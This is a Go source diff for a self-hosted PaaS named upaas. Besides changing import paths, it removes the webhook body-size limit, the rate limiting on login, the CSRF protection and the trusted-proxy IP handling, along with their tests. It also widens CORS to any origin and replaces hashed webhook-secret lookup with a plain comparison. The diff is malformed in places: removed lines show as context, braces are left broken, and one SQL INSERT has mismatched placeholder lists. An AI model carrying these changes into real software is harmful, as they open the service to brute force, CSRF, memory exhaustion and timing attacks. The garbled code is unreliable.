 		t.Run(tt.name, func(t *testing.T) {
 			t.Parallel()
 			err := ValidateVolumePath(tt.path)
 			if (err != nil) != tt.wantErr {
 				t.Errorf("ValidateVolumePath(%q) error = %v, wantErr %v",
 					tt.path, err, tt.wantErr)
 			}
 		})
 	}
 }
--- a/internal/handlers/webhook.go
+++ b/internal/handlers/webhook.go
@@ -6,12 +6,9 @@ import (
 	"github.com/go-chi/chi/v5"
-	"sneak.berlin/go/upaas/internal/models"
+	"git.eeqj.de/sneak/upaas/internal/models"
 )
 // maxWebhookBodySize is the maximum allowed size of a webhook request body (1MB).
 const maxWebhookBodySize = 1 << 20
 // HandleWebhook handles incoming Gitea webhooks.
 func (h *Handlers) HandleWebhook() http.HandlerFunc {
 	return func(writer http.ResponseWriter, request *http.Request) {
@@ -41,8 +38,8 @@ func (h *Handlers) HandleWebhook() http.HandlerFunc {
 			return
 		}
-		// Read request body with size limit to prevent memory exhaustion
+		// Read request body
-		body, readErr := io.ReadAll(io.LimitReader(request.Body, maxWebhookBodySize))
+		body, readErr := io.ReadAll(request.Body)
 		if readErr != nil {
 			h.log.Error("failed to read webhook body", "error", readErr)
 			http.Error(writer, "Bad Request", http.StatusBadRequest)
--- a/internal/handlers/webhook_events.go
+++ b/internal/handlers/webhook_events.go
@@ -1,56 +0,0 @@
 package handlers
 import (
 	"net/http"
 	"github.com/go-chi/chi/v5"
 	"sneak.berlin/go/upaas/internal/models"
 	"sneak.berlin/go/upaas/templates"
 )
 // webhookEventsLimit is the number of webhook events to show in history.
 const webhookEventsLimit = 100
 // HandleAppWebhookEvents returns the webhook event history handler.
 func (h *Handlers) HandleAppWebhookEvents() http.HandlerFunc {
 	tmpl := templates.GetParsed()
 	return func(writer http.ResponseWriter, request *http.Request) {
 		appID := chi.URLParam(request, "id")
 		application, findErr := models.FindApp(request.Context(), h.db, appID)
 		if findErr != nil {
 			h.log.Error("failed to find app", "error", findErr)
 			http.Error(writer, "Internal Server Error", http.StatusInternalServerError)
 			return
 		}
 		if application == nil {
 			http.NotFound(writer, request)
 			return
 		}
 		events, eventsErr := application.GetWebhookEvents(
 			request.Context(),
 			webhookEventsLimit,
 		)
 		if eventsErr != nil {
 			h.log.Error("failed to get webhook events",
 				"error", eventsErr,
 				"app", appID,
 			)
 			events = []*models.WebhookEvent{}
 		}
 		data := h.addGlobals(map[string]any{
 			"App":    application,
 			"Events": events,
 		}, request)
 		h.renderTemplate(writer, tmpl, "webhook_events.html", data)
 	}
 }
--- a/internal/healthcheck/healthcheck.go
+++ b/internal/healthcheck/healthcheck.go
@@ -8,10 +8,10 @@ import (
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
 )
 // Params contains dependencies for Healthcheck.
--- a/internal/logger/logger.go
+++ b/internal/logger/logger.go
@@ -7,7 +7,7 @@ import (
 	"go.uber.org/fx"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
 )
 // Params contains dependencies for Logger.
--- a/internal/logger/testing.go
+++ b/internal/logger/testing.go
@@ -1,11 +0,0 @@
 package logger
 import "log/slog"
 // NewForTest creates a Logger wrapping the given slog.Logger, for use in tests.
 func NewForTest(log *slog.Logger) *Logger {
 	return &Logger{
 		log:   log,
 		level: new(slog.LevelVar),
 	}
 }
--- a/internal/middleware/cors_test.go
+++ b/internal/middleware/cors_test.go
@@ -1,81 +0,0 @@
 package middleware //nolint:testpackage // tests internal CORS behavior
 import (
 	"log/slog"
 	"net/http"
 	"net/http/httptest"
 	"testing"
 	"github.com/stretchr/testify/assert"
 	"sneak.berlin/go/upaas/internal/config"
 )
 //nolint:gosec // test credentials
 func newCORSTestMiddleware(corsOrigins string) *Middleware {
 	return &Middleware{
 		log: slog.Default(),
 		params: &Params{
 			Config: &config.Config{
 				CORSOrigins:   corsOrigins,
 				SessionSecret: "test-secret-32-bytes-long-enough",
 			},
 		},
 	}
 }
 func TestCORS_NoOriginsConfigured_NoCORSHeaders(t *testing.T) {
 	t.Parallel()
 	m := newCORSTestMiddleware("")
 	handler := m.CORS()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
 		w.WriteHeader(http.StatusOK)
 	}))
 	req := httptest.NewRequest(http.MethodGet, "/", nil)
 	req.Header.Set("Origin", "https://evil.com")
 	rec := httptest.NewRecorder()
 	handler.ServeHTTP(rec, req)
 	assert.Empty(t, rec.Header().Get("Access-Control-Allow-Origin"),
 		"expected no CORS headers when no origins configured")
 }
 func TestCORS_OriginsConfigured_AllowsMatchingOrigin(t *testing.T) {
 	t.Parallel()
 	m := newCORSTestMiddleware("https://app.example.com,https://other.example.com")
 	handler := m.CORS()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
 		w.WriteHeader(http.StatusOK)
 	}))
 	req := httptest.NewRequest(http.MethodGet, "/", nil)
 	req.Header.Set("Origin", "https://app.example.com")
 	rec := httptest.NewRecorder()
 	handler.ServeHTTP(rec, req)
 	assert.Equal(t, "https://app.example.com",
 		rec.Header().Get("Access-Control-Allow-Origin"))
 	assert.Equal(t, "true",
 		rec.Header().Get("Access-Control-Allow-Credentials"))
 }
 func TestCORS_OriginsConfigured_RejectsNonMatchingOrigin(t *testing.T) {
 	t.Parallel()
 	m := newCORSTestMiddleware("https://app.example.com")
 	handler := m.CORS()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
 		w.WriteHeader(http.StatusOK)
 	}))
 	req := httptest.NewRequest(http.MethodGet, "/", nil)
 	req.Header.Set("Origin", "https://evil.com")
 	rec := httptest.NewRecorder()
 	handler.ServeHTTP(rec, req)
 	assert.Empty(t, rec.Header().Get("Access-Control-Allow-Origin"),
 		"expected no CORS headers for non-matching origin")
 }
--- a/internal/middleware/middleware.go
+++ b/internal/middleware/middleware.go
@@ -3,25 +3,19 @@ package middleware
 import (
 	"log/slog"
 	"math"
 	"net"
 	"net/http"
 	"strconv"
 	"strings"
 	"sync"
 	"time"
 	"github.com/99designs/basicauth-go"
 	"github.com/go-chi/chi/v5/middleware"
 	"github.com/go-chi/cors"
 	"github.com/gorilla/csrf"
 	"go.uber.org/fx"
 	"golang.org/x/time/rate"
-	"sneak.berlin/go/upaas/internal/config"
+	"git.eeqj.de/sneak/upaas/internal/config"
-	"sneak.berlin/go/upaas/internal/globals"
+	"git.eeqj.de/sneak/upaas/internal/globals"
-	"sneak.berlin/go/upaas/internal/logger"
+	"git.eeqj.de/sneak/upaas/internal/logger"
-	"sneak.berlin/go/upaas/internal/service/auth"
+	"git.eeqj.de/sneak/upaas/internal/service/auth"
 )
 // corsMaxAge is the maximum age for CORS preflight responses in seconds.
@@ -91,7 +85,7 @@ func (m *Middleware) Logging() func(http.Handler) http.Handler {
 					"request_id", reqID,
 					"referer", request.Referer(),
 					"proto", request.Proto,
-					"remoteIP", realIP(request),
+					"remoteIP", ipFromHostPort(request.RemoteAddr),
 					"status", lrw.statusCode,
 					"latency_ms", latency.Milliseconds(),
 				)
@@ -111,114 +105,18 @@ func ipFromHostPort(hostPort string) string {
 	return host
 }
 // trustedProxyNets are RFC1918 and loopback CIDRs whose proxy headers we trust.
 //
 //nolint:gochecknoglobals // package-level constant nets parsed once
 var trustedProxyNets = func() []*net.IPNet {
 	cidrs := []string{
 		"10.0.0.0/8",
 		"172.16.0.0/12",
 		"192.168.0.0/16",
 		"127.0.0.0/8",
 		"::1/128",
 		"fc00::/7",
 	}
 	nets := make([]*net.IPNet, 0, len(cidrs))
 	for _, cidr := range cidrs {
 		_, n, _ := net.ParseCIDR(cidr)
 		nets = append(nets, n)
 	}
 	return nets
 }()
 // isTrustedProxy reports whether ip is in an RFC1918, loopback, or ULA range.
 func isTrustedProxy(ip net.IP) bool {
 	for _, n := range trustedProxyNets {
 		if n.Contains(ip) {
 			return true
 		}
 	}
 	return false
 }
 // realIP extracts the client's real IP address from the request.
 // Proxy headers (X-Real-IP, X-Forwarded-For) are only trusted when the
 // direct connection originates from an RFC1918/loopback address.
 // Otherwise, headers are ignored and RemoteAddr is used (fail closed).
 func realIP(r *http.Request) string {
 	addr := ipFromHostPort(r.RemoteAddr)
 	remoteIP := net.ParseIP(addr)
 	// Only trust proxy headers from private/loopback sources.
 	if remoteIP == nil || !isTrustedProxy(remoteIP) {
 		return addr
 	}
 	// 1. X-Real-IP (set by Traefik/nginx)
 	if ip := strings.TrimSpace(r.Header.Get("X-Real-IP")); ip != "" {
 		return ip
 	}
 	// 2. X-Forwarded-For: take the first (leftmost/client) IP
 	if xff := r.Header.Get("X-Forwarded-For"); xff != "" {
 		if parts := strings.SplitN(xff, ",", 2); len(parts) > 0 { //nolint:mnd
 			if ip := strings.TrimSpace(parts[0]); ip != "" {
 				return ip
 			}
 		}
 	}
 	// 3. Fall back to RemoteAddr
 	return addr
 }
 // CORS returns CORS middleware.
 // When UPAAS_CORS_ORIGINS is empty (default), no CORS headers are sent
 // (same-origin only). When configured, only the specified origins are
 // allowed and credentials (cookies) are permitted.
 func (m *Middleware) CORS() func(http.Handler) http.Handler {
 	origins := parseCORSOrigins(m.params.Config.CORSOrigins)
 	// No origins configured — no CORS headers (same-origin policy).
 	if len(origins) == 0 {
 		return func(next http.Handler) http.Handler {
 			return next
 		}
 	}
 	return cors.Handler(cors.Options{
-		AllowedOrigins:   origins,
+		AllowedOrigins:   []string{"*"},
 		AllowedMethods:   []string{"GET", "POST", "PUT", "DELETE", "OPTIONS"},
 		AllowedHeaders:   []string{"Accept", "Authorization", "Content-Type", "X-CSRF-Token"},
 		ExposedHeaders:   []string{"Link"},
-		AllowCredentials: true,
+		AllowCredentials: false,
 		MaxAge:           corsMaxAge,
 	})
 }
 // parseCORSOrigins splits a comma-separated origin string into a slice,
 // trimming whitespace. Returns nil if the input is empty.
 func parseCORSOrigins(raw string) []string {
 	if raw == "" {
 		return nil
 	}
 	parts := strings.Split(raw, ",")
 	origins := make([]string, 0, len(parts))
 	for _, p := range parts {
 		if o := strings.TrimSpace(p); o != "" {
 			origins = append(origins, o)
 		}
 	}
 	return origins
 }
 // MetricsAuth returns basic auth middleware for metrics endpoint.
 func (m *Middleware) MetricsAuth() func(http.Handler) http.Handler {
 	if m.params.Config.MetricsUsername == "" {
@@ -254,143 +152,6 @@ func (m *Middleware) SessionAuth() func(http.Handler) http.Handler {
 	}
 }
 // CSRF returns CSRF protection middleware using gorilla/csrf.
 func (m *Middleware) CSRF() func(http.Handler) http.Handler {
 	return csrf.Protect(
 		[]byte(m.params.Config.SessionSecret),
 		csrf.Secure(false), // Allow HTTP for development; reverse proxy handles TLS
 		csrf.Path("/"),
 	)
 }
 // loginRateLimit configures the login rate limiter.
 const (
 	loginRateLimit      = rate.Limit(5.0 / 60.0) // 5 requests per 60 seconds
 	loginBurst          = 5                      // allow burst of 5
 	limiterExpiry       = 10 * time.Minute       // evict entries not seen in 10 minutes
 	limiterCleanupEvery = 1 * time.Minute        // sweep interval
 )
 // ipLimiterEntry stores a rate limiter with its last-seen timestamp.
 type ipLimiterEntry struct {
 	limiter  *rate.Limiter
 	lastSeen time.Time
 }
 // ipLimiter tracks per-IP rate limiters for login attempts with automatic
 // eviction of stale entries to prevent unbounded memory growth.
 type ipLimiter struct {
 	mu        sync.Mutex
 	limiters  map[string]*ipLimiterEntry
 	lastSweep time.Time
 }
 func newIPLimiter() *ipLimiter {
 	return &ipLimiter{
 		limiters:  make(map[string]*ipLimiterEntry),
 		lastSweep: time.Now(),
 	}
 }
 // sweep removes entries not seen within limiterExpiry. Must be called with mu held.
 func (i *ipLimiter) sweep(now time.Time) {
 	for ip, entry := range i.limiters {
 		if now.Sub(entry.lastSeen) > limiterExpiry {
 			delete(i.limiters, ip)
 		}
 	}
 	i.lastSweep = now
 }
 func (i *ipLimiter) getLimiter(ip string) *rate.Limiter {
 	i.mu.Lock()
 	defer i.mu.Unlock()
 	now := time.Now()
 	// Lazy sweep: clean up stale entries periodically.
 	if now.Sub(i.lastSweep) >= limiterCleanupEvery {
 		i.sweep(now)
 	}
 	entry, exists := i.limiters[ip]
 	if !exists {
 		entry = &ipLimiterEntry{
 			limiter: rate.NewLimiter(loginRateLimit, loginBurst),
 		}
 		i.limiters[ip] = entry
 	}
 	entry.lastSeen = now
 	return entry.limiter
 }
 // loginLimiter is the singleton IP rate limiter for login attempts.
 //
 //nolint:gochecknoglobals // intentional singleton for rate limiting state
 var loginLimiter = newIPLimiter()
 // LoginRateLimit returns middleware that rate-limits login attempts per IP.
 // It allows 5 attempts per minute and returns 429 Too Many Requests when exceeded.
 func (m *Middleware) LoginRateLimit() func(http.Handler) http.Handler {
 	return func(next http.Handler) http.Handler {
 		return http.HandlerFunc(func(
 			writer http.ResponseWriter,
 			request *http.Request,
 		) {
 			ip := realIP(request)
 			limiter := loginLimiter.getLimiter(ip)
 			if !limiter.Allow() {
 				m.log.WarnContext(request.Context(), "login rate limit exceeded",
 					"remoteIP", ip,
 				)
 				// Compute seconds until the next token is available.
 				reservation := limiter.Reserve()
 				delay := reservation.Delay()
 				reservation.Cancel()
 				retryAfter := max(int(math.Ceil(delay.Seconds())), 1)
 				writer.Header().Set("Retry-After", strconv.Itoa(retryAfter))
 				http.Error(
 					writer,
 					"Too Many Requests",
 					http.StatusTooManyRequests,
 				)
 				return
 			}
 			next.ServeHTTP(writer, request)
 		})
 	}
 }
 // APISessionAuth returns middleware that requires session authentication for API routes.
 // Unlike SessionAuth, it returns JSON 401 responses instead of redirecting to /login.
 func (m *Middleware) APISessionAuth() func(http.Handler) http.Handler {
 	return func(next http.Handler) http.Handler {
 		return http.HandlerFunc(func(
 			writer http.ResponseWriter,
 			request *http.Request,
 		) {
 			user, err := m.params.Auth.GetCurrentUser(request.Context(), request)
 			if err != nil || user == nil {
 				writer.Header().Set("Content-Type", "application/json")
 				http.Error(writer, `{"error":"unauthorized"}`, http.StatusUnauthorized)
 				return
 			}
 			next.ServeHTTP(writer, request)
 		})
 	}
 }
 // SetupRequired returns middleware that redirects to setup if no user exists.
 func (m *Middleware) SetupRequired() func(http.Handler) http.Handler {
 	return func(next http.Handler) http.Handler {
@@ -411,14 +172,8 @@ func (m *Middleware) SetupRequired() func(http.Handler) http.Handler {
 			}
 			if setupRequired {
-				path := request.URL.Path
+				// Allow access to setup page
-
+				if request.URL.Path == "/setup" {
 				// Allow access to setup page, health endpoint, static
 				// assets, and API routes even before setup is complete.
 				if path == "/setup" ||
 					path == "/health" ||
 					strings.HasPrefix(path, "/s/") ||
 					strings.HasPrefix(path, "/api/") {
 					next.ServeHTTP(writer, request)
 					return
--- a/internal/middleware/ratelimit_test.go
+++ b/internal/middleware/ratelimit_test.go
@@ -1,141 +0,0 @@
 package middleware //nolint:testpackage // tests unexported types and globals
 import (
 	"log/slog"
 	"net/http"
 	"net/http/httptest"
 	"testing"
 	"time"
 	"github.com/stretchr/testify/assert"
 	"sneak.berlin/go/upaas/internal/config"
 )
 func newTestMiddleware(t *testing.T) *Middleware {
 	t.Helper()
 	return &Middleware{
 		log: slog.Default(),
 		params: &Params{
 			Config: &config.Config{},
 		},
 	}
 }
 //nolint:paralleltest // mutates global loginLimiter
 func TestLoginRateLimitAllowsUpToBurst(t *testing.T) {
 	// Reset the global limiter to get clean state
 	loginLimiter = newIPLimiter()
 	mw := newTestMiddleware(t)
 	handler := mw.LoginRateLimit()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
 		w.WriteHeader(http.StatusOK)
 	}))
 	// First 5 requests should succeed (burst)
 	for i := range 5 {
 		req := httptest.NewRequest(http.MethodPost, "/login", nil)
 		req.RemoteAddr = "192.168.1.1:12345"
 		rec := httptest.NewRecorder()
 		handler.ServeHTTP(rec, req)
 		assert.Equal(t, http.StatusOK, rec.Code, "request %d should succeed", i+1)
 	}
 	// 6th request should be rate limited
 	req := httptest.NewRequest(http.MethodPost, "/login", nil)
 	req.RemoteAddr = "192.168.1.1:12345"
 	rec := httptest.NewRecorder()
 	handler.ServeHTTP(rec, req)
 	assert.Equal(t, http.StatusTooManyRequests, rec.Code, "6th request should be rate limited")
 }
 //nolint:paralleltest // mutates global loginLimiter
 func TestLoginRateLimitIsolatesIPs(t *testing.T) {
 	loginLimiter = newIPLimiter()
 	mw := newTestMiddleware(t)
 	handler := mw.LoginRateLimit()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
 		w.WriteHeader(http.StatusOK)
 	}))
 	// Exhaust IP1's budget
 	for range 5 {
 		req := httptest.NewRequest(http.MethodPost, "/login", nil)
 		req.RemoteAddr = "10.0.0.1:1234"
 		rec := httptest.NewRecorder()
 		handler.ServeHTTP(rec, req)
 	}
 	// IP1 should be blocked
 	req := httptest.NewRequest(http.MethodPost, "/login", nil)
 	req.RemoteAddr = "10.0.0.1:1234"
 	rec := httptest.NewRecorder()
 	handler.ServeHTTP(rec, req)
 	assert.Equal(t, http.StatusTooManyRequests, rec.Code)
 	// IP2 should still work
 	req2 := httptest.NewRequest(http.MethodPost, "/login", nil)
 	req2.RemoteAddr = "10.0.0.2:1234"
 	rec2 := httptest.NewRecorder()
 	handler.ServeHTTP(rec2, req2)
 	assert.Equal(t, http.StatusOK, rec2.Code, "different IP should not be rate limited")
 }
 //nolint:paralleltest // mutates global loginLimiter
 func TestLoginRateLimitReturns429Body(t *testing.T) {
 	loginLimiter = newIPLimiter()
 	mw := newTestMiddleware(t)
 	handler := mw.LoginRateLimit()(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {
 		w.WriteHeader(http.StatusOK)
 	}))
 	// Exhaust burst
 	for range 5 {
 		req := httptest.NewRequest(http.MethodPost, "/login", nil)
 		req.RemoteAddr = "172.16.0.1:5555"
 		rec := httptest.NewRecorder()
 		handler.ServeHTTP(rec, req)
 	}
 	req := httptest.NewRequest(http.MethodPost, "/login", nil)
 	req.RemoteAddr = "172.16.0.1:5555"
 	rec := httptest.NewRecorder()
 	handler.ServeHTTP(rec, req)
 	assert.Equal(t, http.StatusTooManyRequests, rec.Code)
 	assert.Contains(t, rec.Body.String(), "Too Many Requests")
 	assert.NotEmpty(t, rec.Header().Get("Retry-After"), "should include Retry-After header")
 }
 func TestIPLimiterEvictsStaleEntries(t *testing.T) {
 	t.Parallel()
 	il := newIPLimiter()
 	// Add an entry and backdate its lastSeen
 	il.mu.Lock()
 	il.limiters["1.2.3.4"] = &ipLimiterEntry{
 		limiter:  nil,
 		lastSeen: time.Now().Add(-15 * time.Minute),
 	}
 	il.limiters["5.6.7.8"] = &ipLimiterEntry{
 		limiter:  nil,
 		lastSeen: time.Now(),
 	}
 	il.mu.Unlock()
 	// Trigger sweep
 	il.mu.Lock()
 	il.sweep(time.Now())
 	il.mu.Unlock()
 	il.mu.Lock()
 	defer il.mu.Unlock()
 	assert.NotContains(t, il.limiters, "1.2.3.4", "stale entry should be evicted")
 	assert.Contains(t, il.limiters, "5.6.7.8", "fresh entry should remain")
 }
--- a/internal/middleware/realip_test.go
+++ b/internal/middleware/realip_test.go
@@ -1,157 +0,0 @@
 package middleware //nolint:testpackage // tests unexported realIP function
 import (
 	"context"
 	"net"
 	"net/http"
 	"testing"
 )
 func TestRealIP(t *testing.T) { //nolint:funlen // table-driven test
 	t.Parallel()
 	tests := []struct {
 		name       string
 		remoteAddr string
 		xRealIP    string
 		xff        string
 		want       string
 	}{
 		// === Trusted proxy (RFC1918 / loopback) — headers ARE honoured ===
 		{
 			name:       "trusted: X-Real-IP from 10.x",
 			remoteAddr: "10.0.0.1:1234",
 			xRealIP:    "203.0.113.5",
 			xff:        "198.51.100.1, 10.0.0.1",
 			want:       "203.0.113.5",
 		},
 		{
 			name:       "trusted: XFF from 10.x when no X-Real-IP",
 			remoteAddr: "10.0.0.1:1234",
 			xff:        "198.51.100.1, 10.0.0.1",
 			want:       "198.51.100.1",
 		},
 		{
 			name:       "trusted: XFF single IP from 10.x",
 			remoteAddr: "10.0.0.1:1234",
 			xff:        "203.0.113.10",
 			want:       "203.0.113.10",
 		},
 		{
 			name:       "trusted: falls back to RemoteAddr (192.168.x)",
 			remoteAddr: "192.168.1.1:5678",
 			want:       "192.168.1.1",
 		},
 		{
 			name:       "trusted: RemoteAddr without port",
 			remoteAddr: "192.168.1.1",
 			want:       "192.168.1.1",
 		},
 		{
 			name:       "trusted: X-Real-IP with whitespace from 10.x",
 			remoteAddr: "10.0.0.1:1234",
 			xRealIP:    "  203.0.113.5  ",
 			want:       "203.0.113.5",
 		},
 		{
 			name:       "trusted: XFF with whitespace from 10.x",
 			remoteAddr: "10.0.0.1:1234",
 			xff:        "  198.51.100.1 , 10.0.0.1",
 			want:       "198.51.100.1",
 		},
 		{
 			name:       "trusted: empty X-Real-IP falls through to XFF from 10.x",
 			remoteAddr: "10.0.0.1:1234",
 			xRealIP:    "  ",
 			xff:        "198.51.100.1",
 			want:       "198.51.100.1",
 		},
 		{
 			name:       "trusted: loopback honours X-Real-IP",
 			remoteAddr: "127.0.0.1:9999",
 			xRealIP:    "93.184.216.34",
 			want:       "93.184.216.34",
 		},
 		{
 			name:       "trusted: 172.16.x honours XFF",
 			remoteAddr: "172.16.0.1:4321",
 			xff:        "8.8.8.8",
 			want:       "8.8.8.8",
 		},
 		// === Untrusted proxy (public IP) — headers IGNORED, use RemoteAddr ===
 		{
 			name:       "untrusted: X-Real-IP ignored from public IP",
 			remoteAddr: "203.0.113.50:1234",
 			xRealIP:    "10.0.0.1",
 			want:       "203.0.113.50",
 		},
 		{
 			name:       "untrusted: XFF ignored from public IP",
 			remoteAddr: "198.51.100.99:5678",
 			xff:        "10.0.0.1, 192.168.1.1",
 			want:       "198.51.100.99",
 		},
 		{
 			name:       "untrusted: both headers ignored from public IP",
 			remoteAddr: "8.8.8.8:443",
 			xRealIP:    "1.2.3.4",
 			xff:        "5.6.7.8",
 			want:       "8.8.8.8",
 		},
 		{
 			name:       "untrusted: no headers, public RemoteAddr",
 			remoteAddr: "93.184.216.34:8080",
 			want:       "93.184.216.34",
 		},
 		{
 			name:       "untrusted: public RemoteAddr without port",
 			remoteAddr: "93.184.216.34",
 			want:       "93.184.216.34",
 		},
 	}
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
 			t.Parallel()
 			req, _ := http.NewRequestWithContext(context.Background(), http.MethodGet, "/", nil)
 			req.RemoteAddr = tt.remoteAddr
 			if tt.xRealIP != "" {
 				req.Header.Set("X-Real-IP", tt.xRealIP)
 			}
 			if tt.xff != "" {
 				req.Header.Set("X-Forwarded-For", tt.xff)
 			}
 			got := realIP(req)
 			if got != tt.want {
 				t.Errorf("realIP() = %q, want %q", got, tt.want)
 			}
 		})
 	}
 }
 func TestIsTrustedProxy(t *testing.T) {
 	t.Parallel()
 	trusted := []string{"10.0.0.1", "10.255.255.255", "172.16.0.1", "172.31.255.255",
 		"192.168.0.1", "192.168.255.255", "127.0.0.1", "127.255.255.255", "::1"}
 	untrusted := []string{"8.8.8.8", "203.0.113.1", "172.32.0.1", "11.0.0.1", "2001:db8::1"}
 	for _, addr := range trusted {
 		ip := net.ParseIP(addr)
 		if !isTrustedProxy(ip) {
 			t.Errorf("expected %s to be trusted", addr)
 		}
 	}
 	for _, addr := range untrusted {
 		ip := net.ParseIP(addr)
 		if isTrustedProxy(ip) {
 			t.Errorf("expected %s to be untrusted", addr)
 		}
 	}
 }
--- a/internal/models/app.go
+++ b/internal/models/app.go
@@ -7,15 +7,9 @@ import (
 	"fmt"
 	"time"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
 )
 // appColumns is the standard column list for app queries.
 const appColumns = `id, name, repo_url, branch, dockerfile_path, webhook_secret,
 			ssh_private_key, ssh_public_key, image_id, status,
 			docker_network, ntfy_topic, slack_webhook, webhook_secret_hash,
 			previous_image_id, created_at, updated_at`
 // AppStatus represents the status of an app.
 type AppStatus string
@@ -38,11 +32,9 @@ type App struct {
 	Branch         string
 	DockerfilePath string
 	WebhookSecret  string
 	WebhookSecretHash string
 	SSHPrivateKey  string
 	SSHPublicKey   string
 	ImageID        sql.NullString
 	PreviousImageID   sql.NullString
 	Status         AppStatus
 	DockerNetwork  sql.NullString
 	NtfyTopic      sql.NullString
@@ -78,8 +70,11 @@ func (a *App) Delete(ctx context.Context) error {
 // Reload refreshes the app from the database.
 func (a *App) Reload(ctx context.Context) error {
-	row := a.db.QueryRow(ctx,
+	row := a.db.QueryRow(ctx, `
-		"SELECT "+appColumns+" FROM apps WHERE id = ?",
+		SELECT id, name, repo_url, branch, dockerfile_path, webhook_secret,
 			ssh_private_key, ssh_public_key, image_id, status,
 			docker_network, ntfy_topic, slack_webhook, created_at, updated_at
 		FROM apps WHERE id = ?`,
 		a.ID,
 	)
@@ -141,15 +136,13 @@ func (a *App) insert(ctx context.Context) error {
 		INSERT INTO apps (
 			id, name, repo_url, branch, dockerfile_path, webhook_secret,
 			ssh_private_key, ssh_public_key, image_id, status,
-			docker_network, ntfy_topic, slack_webhook, webhook_secret_hash,
+			docker_network, ntfy_topic, slack_webhook
-			previous_image_id
+		) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`
 		) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?)`
 	_, err := a.db.Exec(ctx, query,
 		a.ID, a.Name, a.RepoURL, a.Branch, a.DockerfilePath, a.WebhookSecret,
 		a.SSHPrivateKey, a.SSHPublicKey, a.ImageID, a.Status,
-		a.DockerNetwork, a.NtfyTopic, a.SlackWebhook, a.WebhookSecretHash,
+		a.DockerNetwork, a.NtfyTopic, a.SlackWebhook,
 		a.PreviousImageID,
 	)
 	if err != nil {
 		return err
@@ -164,7 +157,6 @@ func (a *App) update(ctx context.Context) error {
 			name = ?, repo_url = ?, branch = ?, dockerfile_path = ?,
 			image_id = ?, status = ?,
 			docker_network = ?, ntfy_topic = ?, slack_webhook = ?,
 			previous_image_id = ?,
 			updated_at = CURRENT_TIMESTAMP
 		WHERE id = ?`
@@ -172,7 +164,6 @@ func (a *App) update(ctx context.Context) error {
 		a.Name, a.RepoURL, a.Branch, a.DockerfilePath,
 		a.ImageID, a.Status,
 		a.DockerNetwork, a.NtfyTopic, a.SlackWebhook,
 		a.PreviousImageID,
 		a.ID,
 	)
@@ -186,8 +177,6 @@ func (a *App) scan(row *sql.Row) error {
 		&a.SSHPrivateKey, &a.SSHPublicKey,
 		&a.ImageID, &a.Status,
 		&a.DockerNetwork, &a.NtfyTopic, &a.SlackWebhook,
 		&a.WebhookSecretHash,
 		&a.PreviousImageID,
 		&a.CreatedAt, &a.UpdatedAt,
 	)
 }
@@ -204,8 +193,6 @@ func scanApps(appDB *database.Database, rows *sql.Rows) ([]*App, error) {
 			&app.SSHPrivateKey, &app.SSHPublicKey,
 			&app.ImageID, &app.Status,
 			&app.DockerNetwork, &app.NtfyTopic, &app.SlackWebhook,
 			&app.WebhookSecretHash,
 			&app.PreviousImageID,
 			&app.CreatedAt, &app.UpdatedAt,
 		)
 		if scanErr != nil {
@@ -234,8 +221,11 @@ func FindApp(
 	app := NewApp(appDB)
 	app.ID = appID
-	row := appDB.QueryRow(ctx,
+	row := appDB.QueryRow(ctx, `
-		"SELECT "+appColumns+" FROM apps WHERE id = ?",
+		SELECT id, name, repo_url, branch, dockerfile_path, webhook_secret,
 			ssh_private_key, ssh_public_key, image_id, status,
 			docker_network, ntfy_topic, slack_webhook, created_at, updated_at
 		FROM apps WHERE id = ?`,
 		appID,
 	)
@@ -251,8 +241,7 @@ func FindApp(
 	return app, nil
 }
-// FindAppByWebhookSecret finds an app by webhook secret using a SHA-256 hash
+// FindAppByWebhookSecret finds an app by webhook secret.
 // lookup. This avoids SQL string comparison timing side-channels.
 //
 //nolint:nilnil // returning nil,nil is idiomatic for "not found" in Active Record
 func FindAppByWebhookSecret(
@@ -261,11 +250,13 @@ func FindAppByWebhookSecret(
 	secret string,
 ) (*App, error) {
 	app := NewApp(appDB)
 	secretHash := database.HashWebhookSecret(secret)
-	row := appDB.QueryRow(ctx,
+	row := appDB.QueryRow(ctx, `
-		"SELECT "+appColumns+" FROM apps WHERE webhook_secret_hash = ?",
+		SELECT id, name, repo_url, branch, dockerfile_path, webhook_secret,
-		secretHash,
+			ssh_private_key, ssh_public_key, image_id, status,
 			docker_network, ntfy_topic, slack_webhook, created_at, updated_at
 		FROM apps WHERE webhook_secret = ?`,
 		secret,
 	)
 	err := app.scan(row)
@@ -282,8 +273,11 @@ func FindAppByWebhookSecret(
 // AllApps returns all apps ordered by name.
 func AllApps(ctx context.Context, appDB *database.Database) ([]*App, error) {
-	rows, err := appDB.Query(ctx,
+	rows, err := appDB.Query(ctx, `
-		"SELECT "+appColumns+" FROM apps ORDER BY name",
+		SELECT id, name, repo_url, branch, dockerfile_path, webhook_secret,
 			ssh_private_key, ssh_public_key, image_id, status,
 			docker_network, ntfy_topic, slack_webhook, created_at, updated_at
 		FROM apps ORDER BY name`,
 	)
 	if err != nil {
 		return nil, fmt.Errorf("querying all apps: %w", err)
--- a/internal/models/deployment.go
+++ b/internal/models/deployment.go
@@ -5,10 +5,9 @@ import (
 	"database/sql"
 	"errors"
 	"fmt"
 	"strings"
 	"time"
-	"sneak.berlin/go/upaas/internal/database"
+	"git.eeqj.de/sneak/upaas/internal/database"
 )
 // DeploymentStatus represents the status of a deployment.
@@ -20,7 +19,6 @@ const (
